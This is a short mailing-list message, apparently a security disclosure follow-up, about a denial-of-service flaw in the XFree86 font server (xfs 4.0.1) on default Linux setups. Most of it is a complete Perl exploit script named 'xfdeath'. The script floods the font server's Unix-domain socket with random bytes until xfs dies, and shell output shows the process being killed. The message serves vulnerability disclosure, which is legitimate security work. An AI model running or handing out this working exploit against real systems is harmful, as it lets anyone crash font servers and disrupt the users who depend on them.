Re:XFree86-xfs-4.0.1-1 DoS

["Mathias Dybvik" <tmdybvik () hotmail com>]

I forgot to mention that the TCP attack against the font server is 
(obviously) only applicable to font-servers listening to TCP. (Which is 
probably only the case for systems serving x-terminals.)
Thanks to people 
who pointed this out.

If we want to kill a font-server running on the Mandrake/Redhat/whatever 
*default* setup, we have to send the garbage to the Unix-Domain socket 
instead.

I've only tested this on Mandrake 8.0, on my system it takes about 5-10 
seconds before xfs dies. I appologize if the script is ugly, I'm a PHB, not 
a developer, and the few lines below is more perl than I've written all 
year.

Mathias

[user@userland ~]$ ps -ax|grep xfs
3690 ?        S      0:00 xfs -port -1 -daemon -user xfs
3723 pts/2    S      0:00 grep xfs

[user@userland ~]$./xfdeath

[user@userland ~]$ ps -ax|grep xfs
3780 pts/1    S      0:00 grep xfs

[user@userland ~]$cat xfdeath
#!/usr/bin/perl -w
use Socket;
use strict;
my ($grab, $line, $garbagebyte,$i,$STOP);
sub darned {
$STOP=1;
}
open(GARBAGE, "/dev/urandom") || die "cannot read /dev/urandom: $!";
$SIG{'PIPE'} = 'darned';
for ($i = 0; $i < 1000; ++$i)
{
$STOP=0;
$grab = shift || '/tmp/.font-unix/fs-1';
socket(A_SOCKET, PF_UNIX, SOCK_STREAM, 0)  || die "socket: $!";
connect(A_SOCKET, sockaddr_un($grab)) || die "connect: $!";
while (!$STOP) {
read(GARBAGE, $garbagebyte, 1);
print ".";
print A_SOCKET $garbagebyte;
}
}
exit;

_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.